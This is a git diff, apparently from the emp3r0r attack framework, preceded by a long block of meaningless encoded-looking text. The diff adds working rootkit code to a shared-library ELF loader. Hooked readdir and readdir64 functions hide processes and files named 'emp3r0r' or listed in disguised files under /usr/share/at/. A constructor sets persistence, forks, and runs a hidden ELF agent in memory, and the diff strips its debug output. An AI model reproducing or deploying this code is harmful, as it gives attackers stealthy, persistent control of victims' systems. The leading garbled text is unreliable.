YRocyDncuyM6yZ17dM-vzZdG96QSSL7jLYuWyr-VvRzE10ktVXZGYca_NHv0w6VirVqsSzm-kp4FY5WBJHcyNZjNBiRyWcawgnnyaftVRHjTePl382DKVNhSfV4kYVp795g5jBaejenXlIWomv2qjM6v-q6t6y2pH2CuKQUCF4bCLJ_tgQQhgNe8Ckt42jtNvrxXW_iKtSiA6uuL9oMjRZRyvpgUNV3YfNa62JlZMjYXquvstmGaNq2wHqMB8gGAJggcgOsNjSIJhmNkHVlIDqYZBCK1cwyEoMYkDGITnIQun7x6iUGNo82_Wl1432ISMTYCaLM2RYBhys8E6RhJzW4vjSS7n3FGHKpBRYTIZgM81KxT6L8CyNjNIzrBijgnW-FizWMdnJeAgElX6VsUqYAfspr9LN9J8JB6vcpuMksosvE15AQYEWQJiTW-4MymGKZSmmoSQ9BJNgRCQSu6jrOeAkQVEMaQ7LB9km4aB50GOCKBDa2jX2OLUpoZneWEqBEjHBXYTISnd7BIKzcPGGWy1YosVHQiCEwEw3Q1pMeQo1s8su547MMCEBaipCtCEGKwmLIpJY9GTlg7GgHLH77Q8rn76wdlvILDuaLNvzti_bNotL_P55VlgOJzPC7Qf_Od8my-_6ul5Fcea3Q03IbG7P4-Hyerga7U6vZ96FmZ7EdZELWtEgdyCCvvmCbFYiAbcjek8XHDSbbqsrMKr8mTPKSQCRCCM5SKBYJgUVyfyl_Hz8DqzkEi6wP87Pc-_ruTl97-2q7c1xp_c9bdfL_fp_19Fk2x9V-q743tSEJSEIxHbkIs5n-f-KSiNgCwUQg4vb_Lr_3tv2nw7_6cj-rF_9fdwqDR-N-OmI4ONemN0jSIbeOc12i7al14TbOUlNdl6Xy8zL9Oyws1Zij6-40nD69Xj6PrUX5G0GEwQQ7fa9T0ZIrvodHt7q5dyB_mB_fT4XID-V9Pz_N4i6vJ9rhyfenmxPy9PUzEWt0R5KbV5p58yIGKCUQoUTN2cxOTeiH4OPz_HzdHv74g-HY9gC6Bt3OFYne-SwBAwESB1lD3UPZ-_gbj4vX4uVLy9Fo8bR4N7M_7l9XApppppppppppppuYeaD0mAGoyYZoiG_1DDAf8jcFLuYMDBzzUY9aBnIY2iEmGZd3_U_3RMMzofWQd6lP44wAuIozcZ_R6qhs4NRm61hz6fPaXsb2WalTjlnlAmkYXqew7gcHOE0r4auhFMIItFhIMJ1DeJRZrT0Jp2ZrWPLrXbv_Y-Rm1K9ixbHbouEjLs-B1Ja-xUwqda1hTU61XXGUniKAuULNtVoCMG_ulfV7dhqrjblLoNTcfDgXZMLDrYOd6yjT5dgA6TEfOXRLCQmeSHY_cMcBIkKejU0cv86bwldtErk01UiSzSzfTV6-BUrG2JDhT1-4vzRnn7yzdu3bt27pKnosaZkf8LuSKcKEgnbIgpA` diff --git a/loader/elf/Makefile b/loader/elf/Makefile index b6b3c5df9..820b75d2a 100644 --- a/loader/elf/Makefile +++ b/loader/elf/Makefile @@ -4,7 +4,7 @@ # run demo.exe and loader.so will be opened, put some binary called `emp3r0r` and it will be executed all: loader_so runner_so demo -debug: so_debug demo +debug: loader_so_debug demo runner_so: ${CC} -DOS_LINUX -DARCH_X86_64 runner.c -o runner.so -pie -fPIC -shared -nostdlib -nodefaultlibs -s @@ -19,4 +19,4 @@ demo: ${CC} demo.c -g -ldl -o demo.exe clean: - rm -f loader.so demo.exe + rm -f *.so *.exe diff --git a/loader/elf/loader.c b/loader/elf/loader.c index 4dce14678..d9dd4b54c 100644 --- a/loader/elf/loader.c +++ b/loader/elf/loader.c @@ -1,15 +1,173 @@ -#include -#include #define _GNU_SOURCE +#include "elf.h" +#include +#include +#include +#include #include +#include #include #include +#include +#include +#include +#include #include +#include -#include "elf.h" +// customize these +const char *HIDE_ME = "emp3r0r"; +const char *HIDDEN_PIDS = "/usr/share/at/batch-job.at"; +const char *HIDDEN_FILES = "/usr/share/at/daily-job.at"; + +// trim trailing whitespace from a string +void trim_str(char *buffer) { buffer[strcspn(buffer, "\r\n")] = 0; } + +int is_file_exist(const char *path) { + if (access(path, F_OK) != -1) { + return 1; + } + return 0; +} + +int is_str_in_file(const char *path, const char *str) { + FILE *fd = fopen(path, "r"); + int bufferLength = 255; + char buffer[bufferLength]; + while (fgets(buffer, bufferLength, fd)) { + trim_str(buffer); + if (strncmp(str, buffer, strlen(str)) == 0) { + fclose(fd); + return 1; + } + } + fclose(fd); + return 0; +} + +// check if a pid/file should be hidden +// returns 1 if is PID and hidden +// returns 2 if is file and hidden +// returns 0 if not hidden +int is_hidden(const char *name) { + if (is_file_exist(HIDDEN_PIDS)) { + if (is_str_in_file(HIDDEN_PIDS, name)) { + return 1; + } + } + if (is_file_exist(HIDDEN_FILES)) { + if (is_str_in_file(HIDDEN_FILES, name)) { + return 2; + } + } + return 0; +} + +// Get a directory name given a DIR* handle +static int get_dir_name(DIR *dirp, char *dir_name, size_t size) { + int fd = dirfd(dirp); + if (fd == -1) { + return 0; + } + + char dir_fd_path[64]; + snprintf(dir_fd_path, sizeof(dir_fd_path), "/proc/self/fd/%d", fd); + ssize_t ret = readlink(dir_fd_path, dir_name, size); + if (ret == -1) { + return 0; + } + + dir_name[ret] = 0; + return 1; +} + +DIR *opendir(const char *name) { + static DIR *(*orig_opendir)(const char *) = NULL; + if (!orig_opendir) + orig_opendir = dlsym(RTLD_NEXT, "opendir"); + + DIR *result = orig_opendir(name); + + return result; +} + +struct dirent64 *readdir64(DIR *dirp) { + static struct dirent64 *(*orig_readdir64)(DIR *dirp) = NULL; + if (!orig_readdir64) + orig_readdir64 = dlsym(RTLD_NEXT, "readdir64"); + + struct dirent64 *result = NULL; + DIR *proc_1 = opendir("/proc/1"); + struct dirent64 *proc1_dir = orig_readdir64(proc_1); + closedir(proc_1); + + result = orig_readdir64(dirp); + if (!result) { + return NULL; + } + + char pwd[1024]; + if (get_dir_name(dirp, pwd, 1024)) { + // processes + if (strcmp(pwd, "/proc") == 0) { + if (is_hidden(result->d_name) == 1) { + return proc1_dir; + } + } + + // files + if (is_hidden(result->d_name) == 2) { + return proc1_dir; + } + + // HIDE_ME pattern in filename + if (strstr(result->d_name, HIDE_ME)) { + return proc1_dir; + } + } + + return result; +} + +struct dirent *readdir(DIR *dirp) { + static struct dirent *(*orig_readdir)(DIR *dirp) = NULL; + if (!orig_readdir) + orig_readdir = dlsym(RTLD_NEXT, "readdir"); + + struct dirent *result = NULL; + DIR *proc_1 = opendir("/proc/1"); + struct dirent *proc1_dir = orig_readdir(proc_1); + closedir(proc_1); + + result = orig_readdir(dirp); + if (!result) { + return NULL; + } + + char pwd[1024]; + if (get_dir_name(dirp, pwd, 1024)) { + // processes + if (strcmp(pwd, "/proc") == 0) { + if (is_hidden(result->d_name) == 1) { + return proc1_dir; + } + } + + // files + if (is_hidden(result->d_name) == 2) { + return proc1_dir; + } + + // HIDE_ME pattern in filename + if (strstr(result->d_name, HIDE_ME)) { + return proc1_dir; + } + } + + return result; +} void __attribute__((constructor)) initLibrary(void) { - pid_t child = fork(); // prevent self delete of agent // see cmd/agent/main.go setenv("PERSISTENCE", "true", 1); @@ -34,10 +192,14 @@ void __attribute__((constructor)) initLibrary(void) { snprintf(elf_path, 1024, "%s/_%s", cwd, exe_name); } + // check if target ELF file exists, if not, abort + if (!is_file_exist(elf_path)) { + return; + } + // read it FILE *f = fopen(elf_path, "rb"); if (f == NULL) { - perror("fopen"); return; } fseek(f, 0, SEEK_END); @@ -50,31 +212,12 @@ void __attribute__((constructor)) initLibrary(void) { char *envv[] = {"PATH=/bin:/usr/bin:/sbin:/usr/sbin", "HOME=/tmp", "PERSISTENCE=true", "LD=true", NULL}; + pid_t child = fork(); // in child process if (child == 0) { // Run the ELF - puts("Loading emp3r0r..."); elf_run(buf, argv, envv); } - - // check if child is dead - int wstatus; - int w = waitpid(child, &wstatus, WNOHANG); - if (w == -1) { - perror("waitpid"); - return; - } - if (WIFEXITED(wstatus) || WIFSIGNALED(wstatus)) { - wait(NULL); // clean up zombie - - // elf loader failed, try execve directly - child = fork(); - if (child == 0) { - if (execve(elf_path, argv, envv) < 0) { - perror("execve"); - } - } - } } void __attribute__((destructor)) cleanUpLibrary(void) {} diff --git a/loader/elf/runner.c b/loader/elf/runner.c index e4008ef28..e5c9a54e0 100644 --- a/loader/elf/runner.c +++ b/loader/elf/runner.c @@ -1,9 +1,8 @@ -#include -#include -#define _GNU_SOURCE #include #include #include +#include +#include void __attribute__((constructor)) initLibrary(void) { pid_t child = fork();